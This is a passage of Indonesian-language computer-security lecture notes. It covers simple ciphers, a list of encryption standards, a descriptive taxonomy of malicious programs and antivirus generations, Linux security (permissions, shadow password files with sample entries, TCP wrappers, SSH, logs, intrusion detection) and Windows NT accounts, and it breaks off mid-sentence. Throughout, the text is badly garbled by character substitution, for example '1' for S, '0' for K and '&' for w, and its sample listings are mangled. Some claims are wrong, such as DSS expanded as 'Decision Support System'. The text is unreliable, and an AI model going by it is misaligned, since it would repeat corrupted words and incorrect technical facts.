@$$->?@P F)U.
d* E#spans!
1uatu metode sederhana untuk mengacak pesan adalah dengan memelarkan pesan itu dengan
aturan tertentu. 1alah satu contoh penggunaan teknik ini adalah dengan meletakkan huruf
konsonan atau bilangan ganjil yang menjadi a&al dari suatu kata di akhir kata itu dan
menambahkan akhiran UanU. Bila suatu kata dimulai dengan huruf %okal atau bilangan genap,
ditambahkan akhiran UiU. Proses enkripsi dengan cara ekspansi terhadap plainteKt terjadi
sebagai berikut '
>ambar 8. .nkripsi dengan .kspansi
"ipherteKtnya adalah U5$, .0,)0-$, $1$@/$, @)P-?>@$F)0$,U. $turan ekspansi
dapat dibuat lebih kompleks. -erkadang teknik ekspansi digabungkan dengan teknik lainnya,
karena teknik ini bila berdiri sendiri terlalu mudah untuk dipecahkan.
e* Pemampatan 'Compa,t!on9
Mengurangi panjang pesan atau jumlah bloknya adalah cara lain untuk menyembunyikan isi
pesan. "ontoh sederhana ini menggunakan cara menghilangkan setiap karakter ke!tiga secara
berurutan. 0arakter!karakter yang dihilangkan disatukan kembali dan disusulkan sebagai
UlampiranU dari pesan utama, dengan dia&ali oleh suatu karakter khusus, dalam contoh ini
digunakan UAU. Proses yang terjadi untuk plainteKt kita adalah '
>ambar J. .nkripsi dengan Pemampatan
$turan penghilangan karakter dan karakter khusus yang berfungsi sebagai pemisah menjadi
dasar untuk proses dekripsi cipherteKt menjadi plainteKt kembali.
/engan menggunakan kelima teknik dasar kriptografi diatas, dapat diciptakan kombinasi
teknik kriptografi yang amat banyak, dengan faktor yang membatasi semata!mata hanyalah
kreati%itas dan imajinasi kita. :alaupun sekilas terlihat sederhana, kombinasi teknik dasar
2al ' 35
Keamanan Komputer
kriptografi dapat menghasilkan teknik kriptografi turunan yang cukup kompleks, dan
beberapa teknik dasar kriptografi masih digunakan dalam teknik kriptografi modern.
0ER0A2AI (OLU(I ENKRIP(I MODERN
3. /ata .ncryption 1tandard (/.1)
standar bagi 61$ >o%ernment
didukung $,1) dan ).-F
popular untuk metode secret key
terdiri dari ' =G!bit, 5D!bit dan <K5D!bit (-riple /.1)
;. $d%anced .ncryption 1tandard ($.1)
untuk menggantikan /.1 (launching akhir ;GG3)
menggunakan %ariable length block chipper
key length ' 3;J!bit, 37;!bit, ;5D!bit
dapat diterapkan untuk smart card.
<. /igital "ertificate 1er%er (/"1)
%erifikasi untuk digital signature
autentikasi user
menggunakan public dan pri%ate key
contoh ' ,etscape "ertificate 1er%er
=. )P 1ecurity ()P1ec)
enkripsi public#pri%ate key
dirancang oleh ")1"? 1ystem
menggunakan /.1 =G!bit dan authentication
built!in pada produk ")1"?
solusi tepat untuk Mirtual Pri%ate ,et&ork (MP,) dan @emote ,et&ork
$ccess
5. 0erberos
solusi untuk user authentication
dapat menangani multiple platform#system
free charge (open source)
)BM menyediakan %ersi komersial ' >lobal 1ign ?n (>1?)
D. Point to point -unneling Protocol(PP-P), +ayer -&o -unneling Protocol (+;-P)
dirancang oleh Microsoft
autentication berdasarkan PPP(Point to point protocol)
enkripsi berdasarkan algoritm Microsoft (tidak terbuka)
terintegrasi dengan ,?1 Microsoft (,-, ;GGG, PP)
8. @emote $ccess /ial!in 6ser 1er%ice (@$/)61)
multiple remote access de%ice menggunakan 3 database untuk authentication
didukung oleh <com, ")1"?, $scend
tidak menggunakan encryption
J. @1$ .ncryption
dirancang oleh @i%est, 1hamir, $dleman tahun 3788
standar de facto dalam enkripsi public#pri%ate key
2al ' 3D
Keamanan Komputer
didukung oleh Microsoft, apple, no%ell, sun, lotus
mendukung proses authentication
multi platform
7. 1ecure 2ash $lgoritm (12$)
dirancang oleh ,ational )nstitute of 1tandard and -echnology (,)1-) 61$.
bagian dari standar /11(/ecision 1upport 1ystem) 61$ dan bekerja sama
dengan /.1 untuk digital signature.
12$!3 menyediakan 3DG!bit message digest
Mersi ' 12$!;5D, 12$!<J=, 12$!53; (terintegrasi dengan $.1)
3G. M/5
dirancang oleh Prof. @obert @i%est (@1$, M)-) tahun 3773
menghasilkan 3;J!bit digest.
cepat tapi kurang aman
33. 1ecure 1hell (112)
digunakan untuk client side authentication antara ; sistem
mendukung 6,)P, &indo&s, ?1#;
melindungi telnet dan ftp (file transfer protocol)
3;. 1ecure 1ocket +ayer (11+)
dirancang oleh ,etscape
menyediakan enkripsi @1$ pada layes session dari model ?1).
independen terhadap ser%ise yang digunakan.
melindungi system secure &eb e!commerce
metode public#pri%ate key dan dapat melakukan authentication
terintegrasi dalam produk bro&ser dan &eb ser%er ,etscape.
3<. 1ecurity -oken
aplikasi penyimpanan pass&ord dan data user di smart card
3=. 1imple 0ey Management for )nternet Protocol
seperti 11+ bekerja pada le%el session model ?1).
menghasilkan key yang static, mudah bobol.
APLIKA(I ENKRIP(I
Beberapa aplikasi yang memerlukan enkripsi untuk pengamanan data atau
komunikasi diantaranya adalah '
a. *asa telekomunikasi
.nkripsi untuk mengamankan informasi konfidensial baik berupa suara,
data, maupun gambar yang akan dikirimkan ke la&an bicaranya.
.nkripsi pada transfer data untuk keperluan manajemen jaringan dan
transfer on!line data billing.
.nkripsi untuk menjaga copyright dari informasi yang diberikan.
b. Militer dan pemerintahan
.nkripsi diantaranya digunakan dalam pengiriman pesan.
Menyimpan data!data rahasia militer dan kenegaraan dalam media
penyimpanannya selalu dalam keaadan terenkripsi.
2al ' 38
Keamanan Komputer
c. /ata Perbankan
)nformasi transfer uang antar bank harus selalu dalam keadaan terenkripsi
d. /ata konfidensial perusahaan
@encana strategis, formula!formula produk, database pelanggan#karya&an
dan database operasional
pusat penyimpanan data perusahaan dapat diakses secara on!line.
-eknik enkripsi juga harus diterapkan untuk data konfidensial untuk
melindungi data dari pembacaan maupun perubahan secara tidak sah.
e. Pengamanan electronic mail
Mengamankan pada saat ditransmisikan maupun dalam media
penyimpanan.
$plikasi enkripsi telah dibuat khusus untuk mengamankan e!mail,
diantaranya P.M (Pri%acy .nhanced Mail) dan P>P (Pretty >ood
Pri%acy), keduanya berbasis /.1 dan @1$.
f. 0artu Plastik
.nkripsi pada 1)M "ard, kartu telepon umum, kartu langganan -M kabel,
kartu kontrol akses ruangan dan komputer, kartu kredit, kartu $-M, kartu
pemeriksaan medis, dll
.nkripsi teknologi penyimpanan data secara magnetic, optik, maupun
chip.
KEAMANAN DARI DEVIL PROGRAM
Ta#sonom! an,aman peran#at luna# - #las!%!#as! proram ja"at 'mal!,!ous proram9'
3. Program!program yang memerlukan program inang (host program). Fragmen
program tidak dapat mandiri secara independen dari suatu program aplikasi, program
utilitas atau program sistem.
;. Program!program yang tidak memerlukan program inang. Program sendiri yang
dapat dijad&alkan dan dijalankan oleh sistem operasi.
T!pe.t!pe proram ja"at :
3. 0a,ter!a ' program yang mengkonsumsi sumber daya sistem dengan mereplikasi
dirinya sendiri. Bacteria tidak secara eksplisit merusak file. -ujuan program ini hanya
satu yaitu mereplikasi dirinya. Program bacteria yang sederhana bisa hanya
mengeksekusi dua kopian dirinya secara simultan pada sistem multiprogramming
atau menciptakan dua file baru, masing!masing adalah kopian file program bacteria.
0edua kopian in kemudian mengkopi dua kali, dan seterusnya.
2al ' 3J
Keamanan Komputer
;. Lo!, bomb ' logik yang ditempelkan pada program komputer agar memeriksa suatu
kumpulan kondisi di sistem. 0etika kondisi!kondisi yang dimaksud ditemui, logik
mengeksekusi suatu fungsi yang menghasilkan aksi!aksi tak diotorisasi.
+ogic bomb menempel pada suatu program resmi yang diset meledak ketika
kondisi!kondisi tertentu dipenuhi.
"ontoh kondisi!kondisi untuk memicu logic bomb adalah ada atau tudak adanya
file!file tertentu, hari tertentu daru minggu atau tanggal, atau pemakai
menjalankan aplikasi tertentu. Begitu terpicu, bomb mengubah atau menghapus
data atau seluruh file, menyebabkan mesin terhenti, atau mengerjakan perusakan
lain.
<. Trapdoor : -itik masuk tak terdokumentasi rahasia di satu program untuk
memberikan akses tanpa metode!metode otentifikasi normal.
-rapdoor telah dipakai secara benar selama bertahun!tahun oleh pemogram untuk
mencari kesalahan program. /ebugging dan testing biasanya dilakukan
pemogram saat mengembangkan aplikasi. 6ntuk program yang mempunyai
prosedur otentifikasi atau setup lama atau memerlukan pemakai memasukkan
nilai!nilai berbeda untuk menjalankan aplikasi maka debugging akan lama bila
harus mele&ati prosedur!prosedur tersebut. 6ntuk debug program jenis ini,
pengembang membuat ke&enangan khusus atau menghilangkan keperluan setup
dan otentifikasi.
-rapdoor adalah kode yang menerima suatu barisan masukan khusus atau dipicu
dengan menjalankan )/ pemakai tertentu atau barisan kejahatan tertentu.
-rapdoor menjadi ancaman ketika digunakan pemrogram jahat untuk memperoleh
pengkasesan tak diotorisasi.
Pada kasus nyata, auditor (pemeriks) perangkat lunak dapat menemukan trapdoor
pada produk perangkat lunak dimana nama pencipta perangkat lunak berlakuk
sebagai pass&ord yang memintas proteksi perangkat lunak yang dibuatnya.
$dalah sulit mengimplementasikan kendali!kendali perangkat lunak untuk
trapdoor.
=. Trojan "orse ' @utin tak terdokumentasi rahasia ditempelkan dalam satu program
berguna. Program yang berguna mengandung kode tersembunyi yang ketika
dijalankan melakukan suatu fungsi yang tak diinginkan. .ksekusi program
menyebabkan eksekusi rutin rahasia ini.
Program!program trojan horse digunakan untuk melakukan fungsi!fungsi secara
tidak langsung dimana pemakai tak diotorisasi tidak dapat melakukannya secara
langsung. "ontoh, untuk dapat mengakses file!file pemakai lain pada sistem
dipakai bersama, pemakai dapat menciptakan program trojan horse.
-rojan horse ini ketika program dieksekusi akan mengubah ijin!ijin file sehinga
file!file dapat dibaca oleh sembarang pemakai. Pencipta program dapat
menyebarkan ke pemakai!pemakai dengan menempatkan program di direktori
bersama dan menamai programnya sedemikian rupa sehingga disangka sebagai
program utilitas yang berguna.
Program trojan horse yang sulit dideteksi adalah kompilator yang dimodifikasi
sehingga menyisipkan kode tambahan ke program!program tertentu begitu
dikompilasi, seperti program login. 0ode menciptakan trapdoor pada program
login yang mengijinkan pencipta log ke sistem menggunakan pass&ord khusus.
-rojan horse jenis ini tak pernah dapat ditemukan jika hanya membaca program
sumber. Moti%asi lain dari trojan horse adalah penghancuran data. Program
muncul sebagai melakukan fungsi!fungsi berguna (seperti kalkulator), tapi juga
secara diam!diam menghapus file!file pemakai.
2al ' 37
Keamanan Komputer
-rojan horse biasa ditempelkan pada program!program atau rutin!rutin yang
diambil dari BB1, internet, dan sebagainya.
5. :!rus ' 0ode yang ditempelkan dalam satu program yang menyebabkan pengkopian
dirinya disisipkan ke satu program lain atau lebih, dengan cara memodifikasi
program!program itu.
Modifikasi dilakukan dengan memasukkan kopian program %irus yang dapat
menginfeksi program!program lain. 1elain hanya progasi, %irus biasanya
melakukan fungsi yang tak diinginkan.
/i dalam %irus komputer, terdapat kode intruksi yang dapat membuat kopian
sempurna dirinya. 0etika komputer yang terinfeksi berhubungan (kontak) dengan
perangkat lunak yang belum terinfeksi, kopian %irus memasuki program baru.
)nfeksi dapat menyebar dari komputer ke komputer melalui pemakai!pemakai
yang menukarkan disk atau mengirim program melalui jaringan. Pada lingkungan
jaringan, kemampuan mengakses aplikasi dan layanan!layanan komputer lain
merupakan fasilitas sempurna penyebaran %irus.
Masalah yang ditimbulkan %irus adalah %irus sering merusak sistem komputer
seperti menghapus file, partisi disk, atau mengacaukan program.
(!#lus "!dup :!rus melalui empat fase (tahap), yaitu '
Fase tidur (dormant phase). Mirus dalam keadaan menganggur. Mirus
akan tiba!tiba aktif oleh suatu kejadian seperti tibanya tanggal tertentu,
kehadiran program atau file tertentu, atau kapasitas disk yang mele&ati
batas. -idak semua %irus mempunyai tahap ini.
Fase propagasi (propagation phase). Mirus menempatkan kopian dirinya
ke program lain atau daerah sistem tertentu di disk. Program yang terinfeksi
%irus akan mempunyai kloning %irus. 0loning %irus itu dapat kembali
memasuki fase propagasi.
Fase pemicuan (triggering phase). Mirus diaktifkan untuk melakukan
fungsi tertentu. 1eperti pada fase tidur, fase pemicuan dapat disebabkan
beragam kejadian sistem termasuk penghitungan jumlah kopian dirinya.
Fase eksekusi (eKecution phase). Mirus menjalankan fungsinya,
fungsinya mungkin sepele seperti sekedar menampilkan pesan dilayar atau
merusak seperti merusak program dan file!file data, dan sebagainya.
0ebanyakan %irus melakukan kerjanya untuk suatu sistem operasi tertentu,
lebih spesifik lagi pada platform perangkat keras tertentu. Mirus!%irus
dirancang memanfaatkan rincian!rincian dan kelemahan!kelemahan sistem
tertentu.
Klas!%!#as! t!pe +!rus '
a. Parasitic %irus. Merupakan %irus tradisional dan bentuk %irus yang paling
sering. -ipe ini mencantolkan dirinya ke file .eKe. Mirus mereplikasi ketika
program terinfeksi dieksekusi dengan mencari file!file .eKe lain untuk
diinfeksi.
b. Memory resident %irus. Mirus memuatkan diri ke memori utama sebagai
bagian program yang menetap. Mirus menginfeksi setiap program yang
dieksekusi.
c. Boot sector %irus. Mirus menginfeksi master boot record atau boot record dan
menyebar saat sistem diboot dari disk yang berisi %irus.
d. 1tealth %irus. Mirus yang bentuknya telah dirancang agar dapat
menyembunyikan diri dari deteksi perangkat lunak anti%irus.
e. Polymorphic %irus. Mirus bermutasi setiap kali melakukan infeksi. /eteksi
dengan penandaan %irus tersebut tidak dimungkinkan. Penulis %irus dapat
melengkapi dengan alat!alat bantu penciptaan %irus baru (%irus creation
2al ' ;G
Keamanan Komputer
toolkit, yaitu rutin!rutin untuk menciptakan %irus!%irus baru). /engan alat
bantu ini penciptaan %irus baru dapat dilakukan dengan cepat. Mirus!%irus
yang diciptakan dengan alat bantu biasanya kurang canggih dibanding %irus!
%irus yang dirancang dari a&al.
D. ;orm ' Program yang dapat mereplikasi dirinya dan mengirim kopian!kopian dari
komputer ke komputer le&at hubungan jaringan. Begitu tiba, &orm diaktifkan untuk
mereplikasi dan progasai kembali. 1elain hanya propagasi, &orm biasanya melakukan
fungsi yang tak diinginkan.
,et&ork &orm menggunakan hubungan jaringan untuk menyebar dari sistem ke
sistem lain. 1ekali aktif di suatu sistem, net&ork &orm dapat berlaku seperti %irus
atau bacteria, atau menempelkan program trojan horse atau melakukan sejumlah
aksi menjengkelkan atau menghancurkan.
6ntuk mereplikasi dirinya, net&ork &orm menggunakan suatu layanan jaringan,
seperti ' Fasilitas surat elektronik (electronic mail facility), yaitu &orm
mengirimkan kopian dirinya ke sistem!sistem lain.
0emampuan eksekusi jarak jauh (remote eKecution capability), yaitu &orm
mengeksekusi kopian dirinya di sistem lain.
0emampuan login jarak jauh (remote login capability), yaitu &orm log pada
sistem jauh sebagai pemakai dan kemudian menggunakan perintah untuk
mengkopi dirinya dari satu sistem ke sistem lain. 0opian program &orm yang
baru kemudian dijalankan di sistem jauh dan melakukan fungsi!fungsi lain yang
dilakukan di sistem itu, &orm terus menyebar dengan cara yang sama.
,et&ork &orm mempunyai ciri!ciri yang sama dengan %irus komputer, yaitu
mempunyai fase!fase sama, yaitu ' /ormant phase, Propagation phase, -rigerring
phase, .Kecution phase.
,et&ork &orm juga berusaha menentukan apakah sistem sebelumnya telah
diinfeksi sebelum mengirim kopian dirinya ke sistem itu.

Ant!+!rus
1olusi ideal terhadap ancaman %irus adalah pen,ea"an. *aringan diijinkan %irus masuk ke
sistem. 1asaran ini, tak mungkin dilaksanakan sepenuhnya. Pencegahan dapat mereduksi
sejumlah serangan %irus. 1etelah pencegahan terhadap masuknya %irus, maka pendekatan
berikutnya yang dapat dilakukan adalah '
3. Dete#s!. Begitu infeksi telah terjadi, tentukan apakah infeksi memang telah terjadi
dan cari lokasi %irus.
;. Ident!%!#as!. Begitu %irus terdeteksi maka identifikasi %irus yang menginfeksi
program.
<. Pen"!lanan. Begitu %irus dapat diidentifikasi maka hilangkan semua jejak %irus
dari program yang terinfeksi dan program dikembalikan ke semua (sebelum
terinfeksi). *ika deteksi %irus sukses dilakukan, tapi identifikasi atau penghilangan
jejak tidak dapat dilakukan, maka alternatif yang dilakukan adalah menghapus
program yang terinfeksi dan kopi kembali backup program yang masih bersih.
Perkembangan program anti%irus dapat diperiode menjadi empat generasi, yaitu '
3. 2eneras! pertama : sekedar scanner sederhana. $nti%irus
menscan program untuk menemukan penanda (signature) %irus. :alaupun %irus
mungkin berisi karakter!karakter %arian, tapi secara esensi mempunyai struktur dan
pola bit yang sama di semua kopiannya. -eknis ini terbatas untuk deteksi %irus!%irus
yang telah dikenal. -ipe lain anti%irus generasi pertama adalah mengelola rekaman
panjang (ukuran) program dan memeriksa perubahan panjang program.
;. 2eneras! #edua : scanner yang pintar (heuristic scanner).
$nti%irus menscan tidak bergantung pada penanda spesifik. $nti%irus menggunakan
2al ' ;3
Keamanan Komputer
aturan!aturan pintar (heuristic rules) untuk mencari kemungkinan infeksi %irus.-eknik
yang dipakai misalnya mencari fragmen! fragmen kode yang sering merupakan
bagian %irus. "ontohnya, anti%irus mencari a&al loop enkripsi yang digunakan
polymorphic %irus dan menemukan kunci enkripsi. Begitu kunci ditemukan, anti%irus
dapat mendeskripsi %irus untuk identifikasi dan kemudian menghilangkan infeksi
%irus. -eknik ini adalah pemeriksanaan integritas. "hecksum dapat ditambahkan di
tiap program. *ika %irus menginfeksi program tanpa mengubah checksum, maka
pemeriksaan integritas akan menemukan perubahan itu. 6ntuk menanggulangi %irus
canggih yang mampu mengubah checksum saat menginfeksi program, fungsi hash
terenkripsi digunakan. 0unci enkripsi disimpan secara terpisah dari program sehingga
program tidak dapat menghasilkan kode hash baru dan mengenkripsinya. /engan
menggunakan fungsi hash bukan checksum sederhana maka mencegah %irus
menyesuaikan program yang menghasilkan kode hash yang sama seperti
sebelumnya.
<. 2eneras! #et!a : jebakan!jebakan akti%itas (acti%ity trap).
Program anti%irus merupakan program yang menetap di memori (memory resident
program). Program ini mengidentifikasi %irus melalui aksi! aksinya bukan dari
struktur program yang diinfeksi. /engan anti%irus semacam in tak perlu
mengembangkan penanda!penanda dan aturan!aturan pintar untuk beragam %irus
yang sangat banyak. /engan cara ini yang diperlukan adalah mengidentifikasi
kumpulan instruksi yang berjumlah sedikit yang mengidentifikasi adanya usaha
infeksi. 0alau muncul kejadian ini, program anti%irus segera menginter%ensi.
=. 2eneras! #eempat : proteksi penuh (full featured protection).
$nti%irus generasi ini menggunakan beragam teknik anti%irus secara bersamaan.
-eknik!teknik ini meliputi scanning dan jebakan!jebakan akti%itas. $nti%irus juga
mempunyai senarai kapabilitas pengaksesan yang membatasi kemampuan %irus
memasuki sistem dan membatasi kemampuan %irus memodifikasi file untuk
menginfeksi file. Pertempuran antara penulis %irus dan pembuat anti%irus masih
berlanjut. :alau beragam strategi lebih lengkap telah dibuat untuk menanggulangi
%irus, penulis %irus pun masih berlanjut menulis %irus yang dapat mele&ati barikade!
barikade yang dibuat penulis anti%irus. 6ntuk pengaman sistem komputer, sebaiknya
pengaksesandan pemakaian komputer dia&asi dengan seksama sehingga tidak
menjalankan program atau memakai disk yang belum terjamin kebersihannya dari
infeksi %irus. Pencegahan terbaik terhadap ancaman %irus adalah mencegah %irus
memasuki sistem disaat yang pertama.
KEAMANAN SISTEM OPERASI
L!nu<
Komponen Ars!te#tur Keamanan L!nu< :
)* A,,ount Pema#a! 'user a,,ount9
0euntungan '
0ekuasaan dalam satu account yaitu root, sehingga mudah dalam
administrasi system.
0ecerobohan salah satu user tidak berpengaruh kepada system secara
keseluruhan.
Masing!masing user memiliki pri%acy yang ketat
2al ' ;;
Keamanan Komputer
Macam 6ser '
@oot ' kontrol system file, user, sumber daya (de%ices) dan akses jaringan
6ser ' account dengan kekuasaan yang diatur oleh root dalam melakukan aktifitas dalam
system.
>roup ' kumpulan user yang memiliki hak sharing yang sejenis terhadap suatu de%ices
tertentu.
4* Kontrol A#ses se,ara D!s#res! 'D!s,ret!onar& A,,ess ,ontrol9
/iscretionary $ccess control (/$") adalah metode pembatasan yang ketat, yang meliputi '
1etiap account memiliki username dan pass&ord sendiri.
1etiap file#de%ice memiliki atribut(read#&rite#eKecution) kepemilikan, group, dan user
umum.
*ika kita lakukan list secara detail menggunakan Ils Yl, kita dapat melihat penerapan /$"
pada file system linuK '
d r! x " fade users #$%& 'eb ( #%)*$ Desktop
r! r r + ,oh hack *#( -ar *$ $+)$" borg.dead.letter
! r&! r ! ! r ! ! 7 >oh hack <3
J
Mar <
G
G7'G5 borg.dead.letter
) 4 5 6 7 8 = > ? )@ ))
0eterangan '
3 X tipe dari file ; tanda dash ( ! ) berarti
file biasa, d berarti directory, l berarti
file link, dsb
5 X
D X
8 X
*umlah link file
,ama pemilik (o&ner)
,ama >roup
; X )Ein akses untuk o&ner (pemilik),
rXread#baca, &X&rite#tulis,
KXeKecute#eksekusi
J X
7 X
3G X
Besar file dalam byte
Bulan dan tanggal update terakhir
:aktu update terakhir
< X )Ein akses untuk group 33 X ,ama file#de%ice
= X )Ein akses untuk other (user lain yang
berada di luar group yang didefinisikan
sebelumnya)
Perintah!perintah penting pada /$" '
Mengubah iEin akses file '
3. bu ' ,"mod A u B B o C A D B . C A r B E B e C nama %!le,
contoh '
chmod u[K g[& o!r borg.dead.letter ; tambahkan akses eksekusi(e) untuk user (u),
tambahkan juga akses &rite(&) untuk group (g) dan kurangi iEin akses read(r) untuk
other(o) user.
;. chmod metode octal, bu' ,"mod . . . nama%!le , digit dash ( ! )
pertama untuk iEin akses user, digit ke!; untuk iEin akses group dan digit ke!< untuk
iEin akses other, berlaku ketentuan ' r(read) X =, &(&rite) X ;, K (eKecute) X 3 dan
tanpa iEin akses X G.
"ontoh '
"hmod 8=G borg.dead.letter
2al ' ;<
Mirus tidak akan mencapai file system, jika sebuah user
terkena, maka akan berpengaruh pada file!file yang dimiliki
oleh user yang mengeksekusi file tersebut.
Keamanan Komputer
Berarti ' bagi file bor/*dead*letter berlaku
digit ke!3 8X=[;[3XiEin akses r,&,K penuh untuk user.
digit ke!; =X=[G[GXiEin akses r untuk group
digit ke!< GXG[G[GXtanpa iEin akses untuk other user.
Mengubah kepemilikan ' cho&n No&ner#pemilikONnama fileO
Mengubah kepemilikan group ' chgrp Ngroup o&nerONnama fileO
Menggunakan account root untuk sementara '
\Isu ; system akan meminta pass&ord
pass&ord ' VVVV ; prompt akan berubah jadi pagar, tanda login sebagai root
\]
Mengaktifkan shado& pass&ord, yaitu membuat file -et,-passEd menjadi dapat dibaca
(readable) tetapi tidak lagi berisi pass&ord, karena sudah dipindahkan ke -et,-s"adoE
"ontoh tipikal file -et,-passEd setelah diaktifkan shado&'
.
root)x)$)$))/root)/bin/bash
fade)x)#$$$)#$*) , , , )/home/fade)/bin/bash
.
+ihat user fade, dapat kita baca sebagai berikut '
username ' fade
Pass&ord ' K
6ser )/ (6)/) ' 3GGG
>roup )/ (>6)/) ' 3G<
0eterangan tambahan ' !
2ome directory ' #home#fade
1hell default ' #bin#bash
Pass&ord!nya bisa dibaca (readable), tapi berupa huruf K saja, pass&ord sebenarnya disimpan
di file -et,-s"adoE dalam keadaan dienkripsi '
.
root)pCfoulj01023o)#$++")$)))))
fade)oi45!6,1f&ti7)#$++")$)+++++)3)))
.
Perlun&a Pro a#t!% passEord
+inuK menggunakan metode /.1 (/ata .ncription 1tandart) untuk pass&ord!nya. 6ser harus
di training dalam memilih pass&ord yang akan digunakannya agar tidak mudah ditebak
dengan program!program crack pass&ord dalam ancaman bruto force attack. /an perlu pula
ditambah dengan program Bantu cek keamanan pass&ord seperti '
Pass&d[ ' meningkatkan loging dan mengingatkan user jika mengisi pass&ord yang
mudah ditebak, ftp'##ftp.dartmouth.edu#pub#security
$nlpass&d ' dapat membuat aturan standar pengisian pass&ord seperti batas minimum,
gabungan huruf besar dengan huruf kecil, gabungan angka dan huruf dsb,
ftp'##coast.rs.purdue.edu#pub#tools#uniK#
5* Kontrol a#ses jar!nan 'NetEor# A,,ess Control9
2al ' ;=
Keamanan Komputer
3!reEall l!nu<
3
'
alat pengontrolan akses antar jaringan yang membuat linuK dapat memilih host yang berhak #
tidak berhak mengaksesnya.
3uns! 3!reEall l!nu< :
$nalisa dan filtering paket
Memeriksa paket -"P, lalu diperlakukan dengan kondisi yang sudah ditentukan, contoh
paket $ lakukan tindakan B.
Blocking content dan protocol
Bloking isi paket seperti applet ja%a, acti%eP, Mbscript, "ookies
$utentikasi koneksi dan enkripsi
Menjalankan enkripsi dalam identitas user, integritas satu session dan melapisi data
dengan algoritma enkripsi seperti ' /.1, triple /.1, Blo&fish, )P1ec, 12$, M/5, )/.$,
dsb.
T!pe %!reEall l!nu< :
$pplication!proKy fire&all#$pplication >ate&ays
/ilakukan pada le%el aplikasi di layer ?1), system proKy ini meneruskan # membagi
paket!paket ke dalam jaringan internal. "ontoh ' soft&are -)1 F:-0 (-ursted
)nformation 1ystem Fire&all -oolkit)
,et&ork le%el Fire&all, fungsi filter dan bloking paket dilakukan di router. "ontoh '
-"P:rappers, aplikasinya ada di #usr#sbin#tcpd. "ara kerjanya '
+ihat isi file -et,-!netd*,on% '
...
telnet stream tcp no!ait root /usr/sbin/telnetd
shell stream tcp no!ait root /usr/sbin/rshd
pop* stream tcp no!ait root /usr/sbin/pop*d
.
dengan diaktifkan -"P&rappers maka isi file -et,-!netd*,on% '
...
telnet stream tcp no!ait root /usr/sbin/tcpd in.telnetd
shell stream tcp no!ait root /usr/sbin/tcpd in.rshd 8
pop* stream tcp no!ait root /usr/sbin/tcpd in.pop*d
.
setiap ada permintaan layanan jarak jauh, dipotong dulu dengan pencocokan rule set yang
telah diatur oleh t,p !n, jika memenuhi syarat diteruskan ke file yang akan diekseskusi,
tapi jika tidak memenuhi syarat digagalkan.
Pengaturan -"P:rapper dilakukan dengan mengkonfigurasi ; file, yaitu '
#etc#host.allo& host yang diperbolehkan mengakses.
#etc#host.deny host yang tidak diperbolehkan mengakses.
6* En#r!ps! 'en,r&pt!on9
Penerapan .nkripsi di linuK '
.nkripsi pass&ord menggunakan /.1 ( /ata .ncryption 1tandard )
.nkripsi komunikasi data '
3. (e,ure ("ell '((H9 Program yang melakukan loging terhadap komputer lain
dalam jaringan, mengeksekusi perintah le&at mesin secara remote dan memindahkan
3
6ntuk membedakan fire&all yang built-in di linuK dengan fire&all dedicated yang banyak digunakan dalam
teknologi jaringan, maka digunakan istilah fire&all linuK.
2al ' ;5
Keamanan Komputer
file dari satu mesin ke mesin lainnya. .nkripsi dalam bentuk Blo&fish, )/.$, @1$,
-riple /.1. )si 112 1uite '
scp (secure shell copy) mengamankan penggandaan data
ssh (secure shell client) model client ssh seperti telnet terenkripsi.
ssh!agent otentikasi le&at jaringan dengan model @1$.
sshd (secure shell ser%er) di port ;;
ssh!keygen pembuat kunci (key generator) untuk ssh
0onfigurasi dilakukan di '
#etc#sshdQconfig (file konfigurasi ser%er)
#etc#sshQconfig (file konfigurasi client)
;. (e,ure so,#et La&er '((L9 mengenkripsi data yang dikirimkan le&at port http.
0onfigurasi dilakukan di ' &eb ser%er $P$"2. dengan ditambah P$-"2 11+.
7* Lo!n
De% : Prosedur dari 1istem ?perasi atau aplikasi merekam setiap kejadian dan menyimpan
rekaman tersebut untuk dapat dianalisa.
1emua file log linuK disimpan di directory #%ar#log, antara lain '
Lastlo ' rekaman user login terakhir kali
last ' rekaman user yang pernah login dengan mencarinya pada file #%ar#log#&tmp
<%erlo ' rekaman informasi login di ftp daemon berupa data &ktu akses, durasi transfer
file, ip dan dns host yang mengakses, jumlah#nama file, tipe transfer(binary#$1"))), arah
transfer(incoming#outgoing), modus akses(anonymous#guest#user resmi), nama#id#layanan
user dan metode otentikasi.
A,,essFlo ' rekaman layanan http # &ebser%er.
ErrorFlo ' rekaman pesan kesalahan atas ser%ice http # &ebser%er berupa data jam dan
&aktu, tipe#alasan kesalahan
Messaes ' rekaman kejadian pada kernel ditangani oleh dua daemon '
o 1yslog merekam semua program yang dijalankan, konfigurasi pada
syslog.conf
o 0log menerima dan merekam semua pesan kernel
8* Dete#s! Pen&usupan 'Intrus!on Dete,t!on9
De% : akti%itas mendeteksi penyusupan secara cepat dengan menggunakan program khusus
secara otomatis yang disebut )ntrusion /etection 1ystem
T!pe dasar ID( :
@uled based system ' mencatat lalu lintas data jika sesuai dengan database dari tanda
penyusupan yang telah dikenal, maka langsung dikategorikan penyusupan. Pendekatan
@uled based system '
o Preemptory (pencegahan) ; )/1 akan memperhatikan semua lalu lintas jaringan,
dan langsung bertindak jika dicurigai ada penyusupan.
o @eactionary (reaksi) ; )/1 hanya mengamati file log saja.
$dapti%e system ' penerapan eKpert system dalam mengamati lalu lintas jaringan.
Proram ID( :
C"#Etmp ' program pengecekan terhadap entry kosong
T,plod ' program pendeteksi stealth scan (scanning yang dilakukan tanpa membuat
sesi tcp)
2al ' ;D
Keamanan Komputer
Host entr& ' program pendeteksi login anomaly (perilaku aneh) biEarre beha%iour
(perilaku aneh), time anomalies (anomaly &aktu), local anomaly.
;!ndoEs NT
Komponen Ars!te#tur Keamanan NT :
)* Adm!n!sras! User dan 2roup
1en!s A,,ount User :
$dministrator
>uest
6ser
1en!s A,,ount 2orup :
$dministrator
>uest
6ser
?perator back!up
Po&er user
?perator ser%er
?perator account
?perator printer
Ha# User - 2rup :
2ak basic ' acces computer from net&ork, back!up files#directory, change system time,
logon locally, manage auditing and security, log (e%ent %ie&er), restore files and
directory, shutdo&n system, take o&nership files or other object, dll.
2ak ad%ance ' access ser%ice and kernel untuk kebutuhan pengembangan system.
4* Keamanan untu# s&stem 3!le
A* NT3( :
"epat dalam operasi standar file (read Y &rite Y search)
-erdapat system file reco%ery, access control dan permission.
Memandang obyek sebagai kumpulan atribut, termasuk permission access.
0* Prote#s! untu# !nter!tas data
Transa,t!on lo!n ' merupakan system file yang dapat di!reco%ery untuk dapat mencatat
semua perubahan terakhir pada directory dan file secara otomatis.
*ika transaksi system berhasil ,- akan melakukan pembaharuan pada file.
*ika transaksi gagal, ,- akan melalui '
